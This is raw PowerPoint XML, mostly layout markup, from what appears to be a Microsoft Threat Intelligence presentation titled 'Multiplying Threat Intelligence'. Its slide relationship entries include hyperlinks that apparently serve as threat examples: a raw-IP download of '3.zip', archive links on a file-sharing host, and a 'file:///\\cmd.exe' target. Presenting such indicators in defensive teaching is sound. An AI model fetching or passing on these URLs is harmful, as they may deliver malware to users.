            <a:lvl5pPr marL="233149" indent="-233149" algn="l" defTabSz="932563" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="612"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr kumimoji="0" lang="en-US" sz="1836"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4D2DCF50-FA9D-AAFF-AF35-94D1302DEDE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12436475" cy="190062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51028" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2040" dirty="0">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="tx1"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="tx1"/>
                  </a:gs>
                </a:gsLst>
                <a:path path="circle">
                  <a:fillToRect l="100000" b="100000"/>
                </a:path>
              </a:gradFill>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7203317D-5BDA-74D5-7EFD-DB6EF34C9527}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4469358" y="793359"/>
            <a:ext cx="7612483" cy="313904"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="2040" kern="1200" dirty="0" smtClean="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:path path="circle">
                    <a:fillToRect l="100000" b="100000"/>
                  </a:path>
                </a:gradFill>
                <a:latin typeface="Segoe UI Semibold"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>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B81D0863-DB50-EB7B-6163-78CA9C446F2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4130407" y="231304"/>
            <a:ext cx="0" cy="1438015"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                    <a:alpha val="0"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="52300">
                  <a:srgbClr val="737373"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="bg2">
                    <a:lumMod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21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 overview">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8077F122-E4F9-3A3F-9AE9-190FEC61EF9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="578103" y="3209063"/>
            <a:ext cx="2173144" cy="172676"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1122">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:path path="circle">
                    <a:fillToRect l="100000" b="100000"/>
                  </a:path>
                </a:gradFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="233149" indent="0">
              <a:buNone/>
              <a:defRPr sz="1122"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="1122"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1122"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1122"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDD557A8-2982-3750-4B97-FCD3FB31198C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:path path="circle">
                    <a:fillToRect l="100000" b="100000"/>
                  </a:path>
                </a:gradFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Straight Connector 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C76EBDE-368F-E976-3606-1D304AC3682D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3109119" y="1209308"/>
            <a:ext cx="0" cy="5354217"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                    <a:alpha val="0"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="52300">
                  <a:srgbClr val="737373"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="bg2">
                    <a:lumMod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BE2540-8E81-31BE-A9FA-2AC0736F7883}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6218238" y="1209308"/>
            <a:ext cx="0" cy="5354217"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                    <a:alpha val="0"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="52300">
                  <a:srgbClr val="737373"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="bg2">
                    <a:lumMod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A98BA5-A48C-D3DA-90D0-ED13DC02BB10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9327356" y="1209308"/>
            <a:ext cx="0" cy="5354217"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                    <a:alpha val="0"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="52300">
                  <a:srgbClr val="737373"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="bg2">
                    <a:lumMod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671C36C0-58C3-BD97-0E88-5D538517DE6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3687221" y="3209063"/>
            <a:ext cx="2173144" cy="172676"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1122">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:path path="circle">
                    <a:fillToRect l="100000" b="100000"/>
                  </a:path>
                </a:gradFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="233149" indent="0">
              <a:buNone/>
              <a:defRPr sz="1122"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="1122"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1122"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1122"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text Placeholder 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFD2A0EE-6D35-5EAD-2984-14705A3FD674}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6772882" y="3209063"/>
            <a:ext cx="2173144" cy="172676"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1122">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:path path="circle">
                    <a:fillToRect l="100000" b="100000"/>
                  </a:path>
                </a:gradFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="233149" indent="0">
              <a:buNone/>
              <a:defRPr sz="1122"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="1122"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1122"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1122"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text Placeholder 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{665E5A57-7501-4F87-A70A-F931569B766E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9859294" y="3209063"/>
            <a:ext cx="2173144" cy="172676"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1122">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:path path="circle">
                    <a:fillToRect l="100000" b="100000"/>
                  </a:path>
                </a:gradFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="233149" indent="0">
              <a:buNone/>
              <a:defRPr sz="1122"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="1122"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1122"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1122"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2674691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785104"/>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03936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3246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01676"/>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cstate="email">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>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239709677"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147484914" r:id="rId1"/>
    <p:sldLayoutId id="2147484915" r:id="rId2"/>
    <p:sldLayoutId id="2147484916" r:id="rId3"/>
    <p:sldLayoutId id="2147484917" r:id="rId4"/>
    <p:sldLayoutId id="2147485001" r:id="rId5"/>
    <p:sldLayoutId id="2147485002" r:id="rId6"/>
    <p:sldLayoutId id="2147485003" r:id="rId7"/>
    <p:sldLayoutId id="2147485004" r:id="rId8"/>
    <p:sldLayoutId id="2147485006" r:id="rId9"/>
    <p:sldLayoutId id="2147485007" r:id="rId10"/>
    <p:sldLayoutId id="2147485008" r:id="rId11"/>
    <p:sldLayoutId id="2147485010" r:id="rId12"/>
    <p:sldLayoutId id="2147485011" r:id="rId13"/>
    <p:sldLayoutId id="2147485012" r:id="rId14"/>
    <p:sldLayoutId id="2147485013" r:id="rId15"/>
    <p:sldLayoutId id="2147485014" r:id="rId16"/>
    <p:sldLayoutId id="2147485015" r:id="rId17"/>
    <p:sldLayoutId id="2147485016" r:id="rId18"/>
    <p:sldLayoutId id="2147485017" r:id="rId19"/>
    <p:sldLayoutId id="2147485018" r:id="rId20"/>
    <p:sldLayoutId id="2147485019" r:id="rId21"/>
    <p:sldLayoutId id="2147485020" r:id="rId22"/>
    <p:sldLayoutId id="2147485021" r:id="rId23"/>
    <p:sldLayoutId id="2147485022" r:id="rId24"/>
    <p:sldLayoutId id="2147485023" r:id="rId25"/>
    <p:sldLayoutId id="2147485024" r:id="rId26"/>
    <p:sldLayoutId id="2147485051" r:id="rId27"/>
    <p:sldLayoutId id="2147485025" r:id="rId28"/>
    <p:sldLayoutId id="2147485026" r:id="rId29"/>
    <p:sldLayoutId id="2147485027" r:id="rId30"/>
    <p:sldLayoutId id="2147485030" r:id="rId31"/>
    <p:sldLayoutId id="2147485031" r:id="rId32"/>
    <p:sldLayoutId id="2147485032" r:id="rId33"/>
    <p:sldLayoutId id="2147485033" r:id="rId34"/>
    <p:sldLayoutId id="2147485034" r:id="rId35"/>
    <p:sldLayoutId id="2147485035" r:id="rId36"/>
    <p:sldLayoutId id="2147485036" r:id="rId37"/>
    <p:sldLayoutId id="2147485037" r:id="rId38"/>
    <p:sldLayoutId id="2147485038" r:id="rId39"/>
    <p:sldLayoutId id="2147485039" r:id="rId40"/>
    <p:sldLayoutId id="2147485040" r:id="rId41"/>
    <p:sldLayoutId id="2147485041" r:id="rId42"/>
    <p:sldLayoutId id="2147485042" r:id="rId43"/>
    <p:sldLayoutId id="2147485043" r:id="rId44"/>
    <p:sldLayoutId id="2147485044" r:id="rId45"/>
    <p:sldLayoutId id="2147485045" r:id="rId46"/>
    <p:sldLayoutId id="2147485046" r:id="rId47"/>
    <p:sldLayoutId id="2147485047" r:id="rId48"/>
    <p:sldLayoutId id="2147484999" r:id="rId49"/>
    <p:sldLayoutId id="2147485000" r:id="rId50"/>
    <p:sldLayoutId id="2147485050" r:id="rId51"/>
    <p:sldLayoutId id="2147484997" r:id="rId52"/>
    <p:sldLayoutId id="2147485133" r:id="rId53"/>
    <p:sldLayoutId id="2147485148" r:id="rId54"/>
  </p:sldLayoutIdLst>
  <p:transition>
    <p:fade/>
  </p:transition>
  <p:hf sldNum="0" hdr="0" ftr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="951304" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr lang="en-US" sz="3200" b="0" kern="1200" cap="none" spc="-51" baseline="0" dirty="0" smtClean="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www.publicdomainpictures.net/view-image.php?image=110776&amp;picture=old-paper-2-back" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.jpg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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7.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attack.mitre.org/matrices/enterprise/pre/"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file:///\\cmd.exe"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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ys-h.ys168.com/3.0/548253621/SIuMfJl7K3T5561HXPJK/DUB_8.0.zip" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://119.10.151.120:1234/3.zip" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout12.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ys-h.ys168.com/3.0/.../" TargetMode="Externa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wmf"/><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8.jpeg"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide15.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout53.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image73.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image72.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.gif"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://images.google.com/imgres?imgurl=http://www.bubbaswholesale.com/images/bullet.jpg&amp;imgrefurl=http://www.bubbaswholesale.com/bulletholes.htm&amp;h=150&amp;w=144&amp;sz=5&amp;tbnid=L2UTrtkUN2EJ:&amp;tbnh=90&amp;tbnw=86&amp;hl=en&amp;start=18&amp;prev=/images?q=bullet+hole&amp;svnum=10&amp;hl=en&amp;lr=" TargetMode="External"/><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3.xml"/><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1.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.jpe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careers" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image98.jp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30D4EF1-5356-BDDA-4058-41412D4F85D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600058" y="3111439"/>
            <a:ext cx="5753363" cy="492443"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Multiplying Threat Intelligence</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE6C5EDF-D15E-0549-6281-E6C98928A3F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="593713" y="4041281"/>
            <a:ext cx="7084742" cy="1036053"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>John Lambert</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Corporate Vice President, Security Fellow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft Corporation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EA19581-C653-40AF-2778-4D63076207AF}"/>
              </a:ext>
              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noGrp="1" noUngrp="1" noRot="1" noMove="1" noResize="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="593713" y="6260379"/>
            <a:ext cx="9110675" cy="193899"/>
            <a:chOff x="593713" y="6260379"/>
            <a:chExt cx="9110675" cy="193899"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="TextBox 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEC3A062-F7A1-721D-1DF1-439B785859AF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noGrp="1" noRot="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9704323" y="6281154"/>
              <a:ext cx="65" cy="152349"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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endParaRPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="FFFFFF">
                        <a:alpha val="80000"/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FFFFFF">
                        <a:alpha val="80000"/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:path path="circle">
                    <a:fillToRect l="100000" b="100000"/>
                  </a:path>
                </a:gradFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="TextBox 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{080D5FC8-54DD-EAE4-EF0C-CBF00ACFD7B2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noGrp="1" noRot="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="593713" y="6260379"/>
              <a:ext cx="4407422" cy="193899"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="914400">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="588"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" kern="0" dirty="0">
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:srgbClr val="FFFFFF">
                          <a:alpha val="80000"/>
                        </a:srgbClr>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="FFFFFF">
                          <a:alpha val="80000"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:path path="circle">
                      <a:fillToRect l="100000" b="100000"/>
                    </a:path>
                  </a:gradFill>
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Microsoft Threat Intelligence</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="337702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E35EB-B3ED-44F6-A55F-40023145D42B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Foundational Concepts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E9DC3F9-4CB4-6EC1-A399-193A207A2F42}"/>
              </a:ext>
            </a:extLst>
